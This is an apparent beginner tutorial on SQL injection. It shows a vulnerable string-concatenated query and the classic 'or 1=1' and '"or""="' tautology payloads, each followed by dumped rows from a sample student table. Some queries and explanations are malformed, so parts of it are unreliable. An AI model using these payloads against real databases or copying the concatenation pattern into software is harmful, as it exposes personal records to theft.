SQL Injection
SQL injection is a technique, this may destroy the database. It is one type of hacking technique.
SQL IN WEB PAGES:
Injection occurs when we ask for input like an id or username, this will run the database automatically.
Example:
Student Table:
| sid | sname | sage | sgender | Phonenumber |
| 1 | Abhinav | 22 | Male | 9895678909 |
| 2 | Ramya | 24 | Female | 6687654634 |
| 3 | Preetham | 21 | Male | 9867546453 |
| 4 | Nethranand | 21 | Male | 7675643423 |
| 5 | Naveen | 23 | Male | 6567784532 |
| 6 | Harshita | 22 | Female | 9867546231 |
| 7 | Bindu | 26 | Female | 6563412768 |
| 8 | Nandhini | 23 | Female | 6785674839 |
| 9 | Hashish | 22 | Male | 9453215052 |
| 10 | Rahul | 21 | Male | 9998989898 |
Code:
Code: id = getRequestString(“sid”);
tsql = “select * from Student where sid = ”+id;
SQL injection based on condition 1=1 is True:
If the user can type instead of wrong inputs i.e, user id or user password the user can use his knowledge in a smart way tto get outputs.
Code:
Select * from Student where id = 105 or 1=1
Output:
| sid | sname | sage | sgender | Phonenumber |
| 1 | Abhinav | 22 | Male | 9895678909 |
| 2 | Ramya | 24 | Female | 6687654634 |
| 3 | Preetham | 21 | Male | 9867546453 |
| 4 | Nethranand | 21 | Male | 7675643423 |
| 5 | Naveen | 23 | Male | 6567784532 |
| 6 | Harshita | 22 | Female | 9867546231 |
| 7 | Bindu | 26 | Female | 6563412768 |
| 8 | Nandhini | 23 | Female | 6785674839 |
| 9 | Hashish | 22 | Male | 9453215052 |
| 10 | Rahul | 21 | Male | 9998989898 |
Note: This above code instead of entering wrong inputs by entering 1 = 1, then returns the details of above mention table. i.e, Student. Displaying the student details of the student by using 1=1 condition.
Displaying the sid, sname of student table.
Code:
Select sid,sname from Student where id = 105 or 1=1
Output:
Student Table:
| sid | sname |
| 1 | Abhinav |
| 2 | Ramya |
| 3 | Preetham |
| 4 | Nethranand |
| 5 | Naveen |
| 6 | Harshita |
| 7 | Bindu |
| 8 | Nandhini |
| 9 | Hashish |
| 10 | Rahul |
Note: This above code instead of entering wrong inputs by entering 1 = 1, then returns the details of above mention table. i.e, Student. Displaying the sid, sname of the student by using 1=1 condition.
Displaying the sname, sage of student table.
Code:
Select sname, sage from Student where id = 105 or 1=1;
Output:
| sname | sage |
| Abhinav | 22 |
| Ramya | 24 |
| Preetham | 21 |
| Nethranand | 21 |
| Naveen | 23 |
| Harshita | 22 |
| Bindu | 26 |
| Nandhini | 23 |
| Hashish | 22 |
| Rahul | 21 |
Displaying the sname, Phonenumber of the student by using 1=1 condition.
Code:
Select sname, Phonenumber from Student where id = 105 or 1=1;
Output:
Student Table:
| sname | Phonenumber |
| Abhinav | 9895678909 |
| Ramya | 6687654634 |
| Preetham | 9867546453 |
| Nethranand | 7675643423 |
| Naveen | 6567784532 |
| Harshita | 9867546231 |
| Bindu | 6563412768 |
| Nandhini | 6785674839 |
| Hashish | 9453215052 |
| Rahul | 9998989898 |
Displaying the sname, sgender of the student by using 1=1 condition.
Code:
Select sname, sgender from Student where id = 105 or 1=1;
Output:
Student Table:
| sname | sgender |
| Abhinav | Male |
| Ramya | Female |
| Preetham | Male |
| Nethranand | Male |
| Naveen | Male |
| Harshita | Female |
| Bindu | Female |
| Nandhini | Female |
| Hashish | Male |
| Rahul | Male |
Displaying the sname, sage, sgender, Phonenumber of the student by using 1=1 condition.
Code:
Select sname, sage, sgender, Phonenumber from Student where id = 105 or 1=1;
Output:
Student Table:
| sname | sage | sgender | Phonenumber |
| Abhinav | 22 | Male | 9895678909 |
| Ramya | 24 | Female | 6687654634 |
| Preetham | 21 | Male | 9867546453 |
| Nethranand | 21 | Male | 7675643423 |
| Naveen | 23 | Male | 6567784532 |
| Harshita | 22 | Female | 9867546231 |
| Bindu | 26 | Female | 6563412768 |
| Nandhini | 23 | Female | 6785674839 |
| Hashish | 22 | Male | 9453215052 |
| Rahul | 21 | Male | 9998989898 |
Injection based on “=” is always true:
If the user can type instead of wrong inputs i.e, user id or user password the user can use his knowledge in a smart way by typing “or” “=”. Id = “or” “=”
Syntax :
Select * from table_name where id = “or” “=”;
Example:
Displaying all the details of student.
Code:
Select * from Student where id = “or” “=”;
Output:
Student Table:
| sid | sname | sage | sgender | Phonenumber |
| 1 | Abhinav | 22 | Male | 9895678909 |
| 2 | Ramya | 24 | Female | 6687654634 |
| 3 | Preetham | 21 | Male | 9867546453 |
| 4 | Nethranand | 21 | Male | 7675643423 |
| 5 | Naveen | 23 | Male | 6567784532 |
| 6 | Harshita | 22 | Female | 9867546231 |
| 7 | Bindu | 26 | Female | 6563412768 |
| 8 | Nandhini | 23 | Female | 6785674839 |
| 9 | Hashish | 22 | Male | 9453215052 |
| 10 | Rahul | 21 | Male | 9998989898 |
Note: This above code instead of entering wrong inputs by entering “or” “=”, then returns the details of above mention table. i.e, Student. Displaying the sid, sname of the student by using “=” condition.
Displaying the sid, sname of student table with “or” “=”
Code:
Select sid, sname from Student where id = “or” “=”;
Output:
Student Table:
| sid | sname |
| 1 | Abhinav |
| 2 | Ramya |
| 3 | Preetham |
| 4 | Nethranand |
| 5 | Naveen |
| 6 | Harshita |
| 7 | Bindu |
| 8 | Nandhini |
| 9 | Hashish |
| 10 | Rahul |
Displaying the sname, sage of the student by using ‘=’ condition.
Code:
Select sname, sage from Student where id = “or” “=”;
Output:
| sname | sage |
| Abhinav | 22 |
| Ramya | 24 |
| Preetham | 21 |
| Nethranand | 21 |
| Naveen | 23 |
| Harshita | 22 |
| Bindu | 26 |
| Nandhini | 23 |
| Hashish | 22 |
| Rahul | 21 |
Displaying the sname, Phonenumber of the student by using ‘=’ condition. Code:
Select sname, Phonenumber from Student where id = “or” “=”;
Output:
Student Table:
| sname | Phonenumber |
| Abhinav | 9895678909 |
| Ramya | 6687654634 |
| Preetham | 9867546453 |
| Nethranand | 7675643423 |
| Naveen | 6567784532 |
| Harshita | 9867546231 |
| Bindu | 6563412768 |
| Nandhini | 6785674839 |
| Hashish | 9453215052 |
| Rahul | 9998989898 |
Displaying the sname, sgender of the student by using ‘=’ condition.
Code:
Select sname, sgender from Student where id = “or” “=”;
Output:
Student Table:
| sname | sgender |
| Abhinav | Male |
| Ramya | Female |
| Preetham | Male |
| Nethranand | Male |
| Naveen | Male |
| Harshita | Female |
| Bindu | Female |
| Nandhini | Female |
| Hashish | Male |
| Rahul | Male |
Displaying the sname, sage, sgender, Phonenumber of the student by using ‘=’ condition.
Code:
Select sname, sage, sgender, Phonenumber from Student where id = “or” “=”; Output:
Student Table:
| sname | sage | sgender | Phonenumber |
| Abhinav | 22 | Male | 9895678909 |
| Ramya | 24 | Female | 6687654634 |
| Preetham | 21 | Male | 9867546453 |
| Nethranand | 21 | Male | 7675643423 |
| Naveen | 23 | Male | 6567784532 |
| Harshita | 22 | Female | 9867546231 |
| Bindu | 26 | Female | 6563412768 |
| Nandhini | 23 | Female | 6785674839 |
| Hashish | 22 | Male | 9453215052 |
| Rahul | 21 | Male | 9998989898 |